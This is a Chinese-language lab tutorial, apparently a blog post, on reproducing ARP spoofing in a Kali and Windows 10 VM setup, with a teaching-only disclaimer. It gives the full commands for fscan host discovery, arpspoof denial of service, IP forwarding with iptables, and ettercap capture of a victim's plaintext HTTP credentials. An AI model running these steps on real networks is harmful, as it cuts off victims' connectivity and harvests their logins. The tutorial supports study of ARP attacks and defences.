当前位置: 首页 > news >正文

kali复现arp欺骗

利用kali复现arp欺骗

本实验旨在帮助学习者理解 ARP 协议工作机制 以及 常见的ARP欺骗攻击原理与防护方法,仅限于 教学和实验环境 使用。实验过程中可能涉及到网络抓包、ARP表修改、ARP欺骗等操作,这些操作在实际生产环境或公共网络中使用可能会对他人网络造成干扰或破坏。

复现步骤

开启两台机器:kali、windows10

image-20250926153041601

确保两个机器是同一个网卡,默认都是nat的vmnet8

查看kali的IP地址(后面用fscan探测的就是kali所在的网络):

ip a

image-20250926153350151

kali查看网络的网关:

route -n

image-20250926153455810

kali利用fscan发现windows主机IP地址:

./FScan_2.0.1_linux_x64 -h kali所在的网段
./FScan_2.0.1_linux_x64 -h 192.168.198.0/24

image-20250926153207923

image-20250926153551378

发现windows10主机的IP地址

所以目前得到的信息是:

+ kali攻击机:192.168.198.130
+ Windows受害主机:192.168.198.129
+ 网关:19.168.198.2

断网攻击

kali执行:

sudo arpspoof -i kali查看网络信息时候的网卡 -t 受害者IP地址 伪装成的IP地址(网关)
sudo arpspoof -i eth0 -t 192.168.198.129 192.168.198.2# 注意sudo需要root的密码,也就是kali,并且输入密码不会显示出来,输入后直接回车就好了

image-20250926154334900

Windows查看arp表:

arp -a

发现网关的mac地址和kali的mac地址一样,攻击成功

image-20250926154359100

windows随便访问一个网站都是失败的:

image-20250926155029663

kali执行arpspoof的终端按ctrl+C可以停止攻击

image-20250926154722372

windows恢复正常

image-20250926154734501

可以访问互联网:

image-20250926155051391

抓取http明文信息(受害机器无感)

kali需要开启IP转发功能

sudo su
# 输入kali回车echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i eth0 -o eth0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

image-20250926155353565

kali执行arp攻击

arpspoof -i 网卡名 -t 受害者IP地址 -r 网关地址
arpspoof -i eth0 -t 192.168.198.129 -r 192.168.198.2

image-20250926155407682

windows查看arp:

image-20250926155427515

攻击成功,观察是否可以上网:

image-20250926155456875

可以上网

kali新开一个终端运行:

sudo su
# 输入kali回车ettercap -Tq -i 网卡名
ettercap -Tq -i eth0

image-20250926155643819

受害windows访问:

http://a.aixjt.com/AdminPublic.html

实验过程中如果发现windows又断网了,需要你重新上面的ip转发的操作就可以

image-20250926155936853

随便输入账号密码之后登录,回到kali运行ettercap的终端:

image-20250926160023565

发现了受害者输入的账号密码

本实验旨在帮助学习者理解 ARP 协议工作机制 以及 常见的ARP欺骗攻击原理与防护方法,仅限于 教学和实验环境 使用。实验过程中可能涉及到网络抓包、ARP表修改、ARP欺骗等操作,这些操作在实际生产环境或公共网络中使用可能会对他人网络造成干扰或破坏。

http://www.zskr.cn/news/12349.html

相关文章:

  • [新教程] Linux服务器修改ssh服务端口
  • 《嵌入式驱动(二):驱动编写基本概念》
  • 程序员的内容创作利器:深度解析小红书爆款笔记生成提示词
  • Unigine整合Myra UI Library全纪录(2):渲染
  • 元人文AI:为价值创新构筑“舞台”、订立“契约”、预演“未来”
  • 设计一个关于python的if 语句的练习题
  • python调试方法:验证安装路径与路径配置
  • 易路一站式智能招聘,开启人才管理新纪元
  • kingbase数据库SHELL端迁移工具访问及使用
  • 微信个人号api|搭建高效微信机器人系统
  • [fakeadmin]-(session伪造flask框架)-CTF
  • 新方向 - MKT
  • PP-OCRv5 C++ 基准测试工具:打造高性能OCR评测标杆 - 详解
  • 翻斗幼儿园历险记-CTF-WP
  • 完整教程:HTTP安全响应头--CSP(Content-Security-Policy)
  • Experiment1
  • Linux系统提权-web/普通用户-docker逃逸提权shell交互
  • 暴力拓客游戏小程序:助力商家高效引流与裂变的智能解决方案
  • 第二类斯特林数
  • 扫码签到赢大奖小程序:助力多场景获客的智能营销工具
  • docker 镜像/容器
  • jmeter命令行参数详细解释
  • 神秘考试题
  • 华三交换机升级版本步骤
  • 企业级 AI 应用开发首选!JBoltAI 框架适配 Java 技术栈,稳定可靠
  • AIGS架构革命:JBoltAI如何重塑Java企业的AI服务生态
  • RAG技术赋能企业数智化转型:JBoltAI如何破解AI落地“最后一公里”难题
  • Java 团队转型 AI 开发难?JBoltAI 框架帮你节省 4-6 个月研发成本
  • IntelliJ IDEA 查找和替换使用指南 - 详解
  • 完整教程:探索 Event 框架实战指南:微服务系统中的事件驱动通信: